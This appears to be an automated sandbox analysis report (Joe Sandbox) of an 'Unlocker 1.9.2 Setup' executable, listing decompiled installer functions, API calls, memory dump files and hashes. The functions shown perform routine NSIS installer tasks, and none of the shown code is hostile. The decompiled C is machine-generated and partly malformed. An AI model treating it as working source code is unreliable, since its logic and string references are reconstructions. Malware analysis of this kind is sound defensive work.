                                                                                                                                                              0x004038ae
                                                                                                                                                              0x004038b4
                                                                                                                                                              0x004038b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040389e
                                                                                                                                                              0x00403852
                                                                                                                                                              0x00403857
                                                                                                                                                              0x00403860
                                                                                                                                                              0x00403859
                                                                                                                                                              0x00403859
                                                                                                                                                              0x00403859
                                                                                                                                                              0x00403857

                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowTextA.USER32(00000000,Unlocker 1.9.2 Setup), ref: 00403887
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$Unlocker 1.9.2 Setup
                                                                                                                                                              • API String ID: 530164218-2643474798
                                                                                                                                                              • Opcode ID: 2885b835fa9f6124610e1a5c6837e8d1ea9164dd69e17ca9c0250379504c76d4
                                                                                                                                                              • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                                                                                                                                              • Opcode Fuzzy Hash: 2885b835fa9f6124610e1a5c6837e8d1ea9164dd69e17ca9c0250379504c76d4
                                                                                                                                                              • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004054D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004054D0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                                                              0x004054d1
                                                                                                                                                              0x004054e8
                                                                                                                                                              0x004054f0
                                                                                                                                                              0x004054f0
                                                                                                                                                              0x004054f8

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                                                                                                                                              • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 2659869361-3081826266
                                                                                                                                                              • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                                                              • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                                                                                                                                              • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                                                              • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E0040593B(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E0040593B(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                                                                              0x00401ec7
                                                                                                                                                              0x00401ecf
                                                                                                                                                              0x00401ed4
                                                                                                                                                              0x00401ed9
                                                                                                                                                              0x00401edd
                                                                                                                                                              0x00401ee0
                                                                                                                                                              0x00401ee2
                                                                                                                                                              0x00401ee9
                                                                                                                                                              0x00401ef2
                                                                                                                                                              0x00401efa
                                                                                                                                                              0x00401efd
                                                                                                                                                              0x00401f12
                                                                                                                                                              0x00401f18
                                                                                                                                                              0x00401f2b
                                                                                                                                                              0x00401f34
                                                                                                                                                              0x00401f40
                                                                                                                                                              0x00401f45
                                                                                                                                                              0x00401f45
                                                                                                                                                              0x00401f2b
                                                                                                                                                              0x00401f48
                                                                                                                                                              0x00401b75
                                                                                                                                                              0x00401b75
                                                                                                                                                              0x00401efd
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                                                              • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                                                                • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1404258612-0
                                                                                                                                                              • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                                                              • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                                                                                                                                              • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                                                              • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405564 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405564(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054FB(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                                                                                                              0x0040556d
                                                                                                                                                              0x00405574
                                                                                                                                                              0x00405577
                                                                                                                                                              0x0040557c
                                                                                                                                                              0x0040558f
                                                                                                                                                              0x004055a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055a9
                                                                                                                                                              0x00405593
                                                                                                                                                              0x00405594
                                                                                                                                                              0x00405597
                                                                                                                                                              0x00405598
                                                                                                                                                              0x004055a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055a2
                                                                                                                                                              0x004055a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405586

                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(00405316,?,C:\,00000000,004055C8,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405572
                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405577
                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405586
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext
                                                                                                                                                              • String ID: C:\
                                                                                                                                                              • API String ID: 3213498283-3404278061
                                                                                                                                                              • Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
                                                                                                                                                              • Instruction ID: fce001944c357d5a5f397a5c884fddf1ab35f0ab5fed97c3c123c2792e791524
                                                                                                                                                              • Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
                                                                                                                                                              • Instruction Fuzzy Hash: D7F0A751905A2179E72262A88C44B7B57ADDB55721F140437E500F61D582BC4C838FEA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402BBE Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x417020; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423e8c;
						if(_t2 >  *0x423e8c) {
							_t3 = CreateDialogParamA( *0x423e80, 0x6f, 0, E00402B3B, 0);
							 *0x417020 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D38(0);
					}
				} else {
					_t6 =  *0x417020; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x417020 = 0;
					return _t6;
				}
			}






                                                                                                                                                              0x00402bc5
                                                                                                                                                              0x00402bdf
                                                                                                                                                              0x00402be5
                                                                                                                                                              0x00402bef
                                                                                                                                                              0x00402bf5
                                                                                                                                                              0x00402bfb
                                                                                                                                                              0x00402c0c
                                                                                                                                                              0x00402c15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402c1a
                                                                                                                                                              0x00402c21
                                                                                                                                                              0x00402be7
                                                                                                                                                              0x00402bee
                                                                                                                                                              0x00402bee
                                                                                                                                                              0x00402bc7
                                                                                                                                                              0x00402bc7
                                                                                                                                                              0x00402bce
                                                                                                                                                              0x00402bd1
                                                                                                                                                              0x00402bd1
                                                                                                                                                              0x00402bd7
                                                                                                                                                              0x00402bde
                                                                                                                                                              0x00402bde

                                                                                                                                                              APIs
                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402BEF
                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                              • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                                                              • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                                                                                                                                              • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004024BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f50 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405954(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                                                              0x004024be
                                                                                                                                                              0x004024be
                                                                                                                                                              0x004024c1
                                                                                                                                                              0x004024dc
                                                                                                                                                              0x004024c3
                                                                                                                                                              0x004024c5
                                                                                                                                                              0x004024ca
                                                                                                                                                              0x004024d1
                                                                                                                                                              0x004024e3
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x004024e9
                                                                                                                                                              0x004024fb
                                                                                                                                                              0x004015a6
                                                                                                                                                              0x004015a8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015ae
                                                                                                                                                              0x004015a8
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll, xrefs: 004024CA, 004024EF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWritelstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll
                                                                                                                                                              • API String ID: 427699356-4254672603
                                                                                                                                                              • Opcode ID: a0c3a0802b62bc71cd7a1c5371c6928424a701658096b665d01367d308066035
                                                                                                                                                              • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                                                                                                                                              • Opcode Fuzzy Hash: a0c3a0802b62bc71cd7a1c5371c6928424a701658096b665d01367d308066035
                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405517 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405517(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                                                              0x00405518
                                                                                                                                                              0x00405522
                                                                                                                                                              0x00405524
                                                                                                                                                              0x0040552b
                                                                                                                                                              0x00405533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405533
                                                                                                                                                              0x00405535
                                                                                                                                                              0x0040553a

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Unlocker1.9.2.exe,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 0040551D
                                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Unlocker1.9.2.exe,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 0040552B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                                              • API String ID: 2709904686-224404859
                                                                                                                                                              • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                                                              • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                                                                                                                                              • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                                                              • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405629 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405629(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                                                              0x00405635
                                                                                                                                                              0x00405637
                                                                                                                                                              0x0040565f
                                                                                                                                                              0x00405644
                                                                                                                                                              0x00405649
                                                                                                                                                              0x00405654
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405671
                                                                                                                                                              0x0040565d
                                                                                                                                                              0x0040565d
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405649
                                                                                                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                              • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                                                              • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                                                                                                                                              • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                                                              • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

